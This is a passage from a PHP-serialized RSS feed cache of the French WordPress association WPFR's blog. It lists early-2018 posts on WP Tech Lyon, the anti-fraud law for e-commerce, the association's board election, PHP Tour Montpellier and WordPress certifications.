Denis\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:50:\"https://wpfr.net/liste-candidats-bureau-2018/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"3\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:45:\"https://wpfr.net/liste-candidats-bureau-2018/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:39:\"\n		\n		\n		\n		\n		\n				\n		\n\n		\n		\n		\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"WPFR sponsor du WP Tech Lyon !\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"http://feedproxy.google.com/~r/WordpressFrancophone/~3/kVgok7MJrJM/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"https://wpfr.net/wpfr-sponsor-wptech-lyon/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 12 Feb 2018 07:00:30 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:4:\"Blog\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:11:\"Evènements\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"https://wpfr.net/?p=2082223\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1507:\"L’association WPFR est fière de vous annoncer qu’elle sponsorise WP Tech 2018 qui aura lieu le 28 avril à Lyon. Le WP Tech est une journée de conférences et d’ateliers exclusivement consacrée aux aspects techniques de WordPress. Vous y découvrirez des outils pour améliorer vos méthodes de travail, apprendrez de nouvelles méthodes de développements d’extensions,<div class=\"btn btn-default read-more text-uppercase\">Lire la suite <span class=\"meta-nav\"><i class=\"fa fa-caret-right\"></i></span></div><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=kVgok7MJrJM:wfMH9NuDwps:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=yIl2AUoC8zA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=kVgok7MJrJM:wfMH9NuDwps:V_sGLiPBpWU\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=kVgok7MJrJM:wfMH9NuDwps:V_sGLiPBpWU\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=kVgok7MJrJM:wfMH9NuDwps:qj6IDK7rITs\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=qj6IDK7rITs\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=kVgok7MJrJM:wfMH9NuDwps:gIN9vFwOqvQ\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=kVgok7MJrJM:wfMH9NuDwps:gIN9vFwOqvQ\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/WordpressFrancophone/~4/kVgok7MJrJM\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Aurélien Denis\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:47:\"https://wpfr.net/wpfr-sponsor-wptech-lyon/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:42:\"https://wpfr.net/wpfr-sponsor-wptech-lyon/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:45:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n\n		\n		\n		\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"Loi anti-fraude et l’e-commerce : les informations officielles\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"http://feedproxy.google.com/~r/WordpressFrancophone/~3/KBb85wMEo0g/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:86:\"https://wpfr.net/loi-anti-fraude-et-le-commerce-les-informations-officielles/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 31 Jan 2018 14:51:34 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:4:{i:0;a:5:{s:4:\"data\";s:10:\"Extensions\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:21:\"WordPress Francophone\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:15:\"Loi anti-fraude\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:11:\"WooCommerce\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"https://wpfr.net/?p=2072415\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1503:\"Cette nouvelle loi a fait couler pas mal d&#8217;encre ces derniers temps et afin d&#8217;apporter des réponses concrètes et officielles, nous nous sommes penchés sur le sujet en profondeur. Voici donc ce qu&#8217;il en ressort officiellement : Les plateformes e-commerce open source sont bien concernées par la loi anti-fraude Que ce soit WooCommerce, Magento, Prestashop,<div class=\"btn btn-default read-more text-uppercase\">Lire la suite <span class=\"meta-nav\"><i class=\"fa fa-caret-right\"></i></span></div><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=KBb85wMEo0g:NZq1YCx1Y5E:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=yIl2AUoC8zA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=KBb85wMEo0g:NZq1YCx1Y5E:V_sGLiPBpWU\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=KBb85wMEo0g:NZq1YCx1Y5E:V_sGLiPBpWU\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=KBb85wMEo0g:NZq1YCx1Y5E:qj6IDK7rITs\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=qj6IDK7rITs\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=KBb85wMEo0g:NZq1YCx1Y5E:gIN9vFwOqvQ\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=KBb85wMEo0g:NZq1YCx1Y5E:gIN9vFwOqvQ\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/WordpressFrancophone/~4/KBb85wMEo0g\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"maximebj\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:82:\"https://wpfr.net/loi-anti-fraude-et-le-commerce-les-informations-officielles/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:2:\"39\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"https://wpfr.net/loi-anti-fraude-et-le-commerce-les-informations-officielles/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:39:\"\n		\n		\n		\n		\n		\n				\n		\n\n		\n		\n		\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"L’élection du bureau WPFR 2018\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"http://feedproxy.google.com/~r/WordpressFrancophone/~3/BC2q8usn6uA/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:52:\"https://wpfr.net/election-bureau-wpfr-2018/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 15 Jan 2018 11:30:54 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:16:\"Association WPFR\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:4:\"Blog\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"https://wpfr.net/?p=2041252\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1530:\"Comme annoncé lors de l’assemblée générale du 12 décembre 2017, l&#8217;heure des élections a sonné. Le bureau actuellement en place voit son mandat terminé, de nouvelles élections doivent donc avoir lieu afin de le renouveler  Ces élections sont prévues pour le 26 février 2018 et nous invitons les membres l&#8217;association désireux d&#8217;occuper des responsabilités nationales à<div class=\"btn btn-default read-more text-uppercase\">Lire la suite <span class=\"meta-nav\"><i class=\"fa fa-caret-right\"></i></span></div><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=BC2q8usn6uA:rovaWM-7xzU:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=yIl2AUoC8zA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=BC2q8usn6uA:rovaWM-7xzU:V_sGLiPBpWU\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=BC2q8usn6uA:rovaWM-7xzU:V_sGLiPBpWU\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=BC2q8usn6uA:rovaWM-7xzU:qj6IDK7rITs\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=qj6IDK7rITs\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=BC2q8usn6uA:rovaWM-7xzU:gIN9vFwOqvQ\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=BC2q8usn6uA:rovaWM-7xzU:gIN9vFwOqvQ\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/WordpressFrancophone/~4/BC2q8usn6uA\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Aurélien Denis\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:48:\"https://wpfr.net/election-bureau-wpfr-2018/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"3\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:43:\"https://wpfr.net/election-bureau-wpfr-2018/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:30:\"\n		\n		\n		\n		\n				\n		\n\n		\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:3:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"PHP Tour Montpellier 2018 : WPFR est partenaire !\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"http://feedproxy.google.com/~r/WordpressFrancophone/~3/i_ty7z2Kg6A/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 11 Jan 2018 10:12:56 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:16:\"Association WPFR\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:4:\"Blog\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"https://wpfr.net/?p=2035309\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1489:\"WPFR est fière d&#8217;être partenaire du PHP Tour Montpellier 2018 qui se tiendra les 17 et 18 mai. Cet évènement porté par l&#8217;AFUP (Association Française des Utilisateurs de PHP) rassemble une sélection d&#8217;orateurs reconnus du monde PHP. Et comme vous le savez, WordPress repose en grande partie sur le langage PHP. Si vous êtes développeurs,<div class=\"btn btn-default read-more text-uppercase\">Lire la suite <span class=\"meta-nav\"><i class=\"fa fa-caret-right\"></i></span></div><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=i_ty7z2Kg6A:5FE8vgrgZLs:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=yIl2AUoC8zA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=i_ty7z2Kg6A:5FE8vgrgZLs:V_sGLiPBpWU\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=i_ty7z2Kg6A:5FE8vgrgZLs:V_sGLiPBpWU\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=i_ty7z2Kg6A:5FE8vgrgZLs:qj6IDK7rITs\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=qj6IDK7rITs\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=i_ty7z2Kg6A:5FE8vgrgZLs:gIN9vFwOqvQ\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=i_ty7z2Kg6A:5FE8vgrgZLs:gIN9vFwOqvQ\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/WordpressFrancophone/~4/i_ty7z2Kg6A\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Aurélien Denis\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"https://wpfr.net/php-tour-montpellier-2018-wpfr-partenaire/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:39:\"\n		\n		\n		\n		\n		\n				\n		\n\n		\n		\n		\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:41:\"Le point sur les certifications WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"http://feedproxy.google.com/~r/WordpressFrancophone/~3/SbTm014V92I/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"https://wpfr.net/point-certifications-wordpress/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 11 Dec 2017 17:15:46 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:16:\"Association WPFR\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:4:\"Blog\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"https://wpfr.net/?p=2001761\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1552:\"Le sujet des certifications WordPress est de retour en cette fin d&#8217;année pour faire un point de situation. L&#8217;association s&#8217;est penchée dessus et voici les conclusions actuelles. Pour rappel, j&#8217;avais émis l&#8217;idée en 2016 de faire certifier les formations WordPress. D&#8217;autres idées ont ensuite suivi, dont notamment celle d&#8217;inscrire WordPress au Registre National des Certifications<div class=\"btn btn-default read-more text-uppercase\">Lire la suite <span class=\"meta-nav\"><i class=\"fa fa-caret-right\"></i></span></div><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=SbTm014V92I:Cd3SuKi-siI:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=yIl2AUoC8zA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=SbTm014V92I:Cd3SuKi-siI:V_sGLiPBpWU\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=SbTm014V92I:Cd3SuKi-siI:V_sGLiPBpWU\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=SbTm014V92I:Cd3SuKi-siI:qj6IDK7rITs\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=qj6IDK7rITs\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=SbTm014V92I:Cd3SuKi-siI:gIN9vFwOqvQ\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=SbTm014V92I:Cd3SuKi-siI:gIN9vFwOqvQ\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/WordpressFrancophone/~4/SbTm014V92I\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"maximebj\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://wpfr.net/point-certifications-wordpress/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:2:\"11\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:48:\"https://wpfr.net/point-certifications-wordpress/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}s:44:\"http://purl.org/rss/1.0/modules/syndication/\";a:2:{s:12:\"updatePeriod\";a:1:{i:0;a:5:{s:4:\"data\";s:6:\"hourly\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:15:\"updateFrequency\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:27:\"http://www.w3.org/2005/Atom\";a:1:{s:4:\"link\";a:2:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"at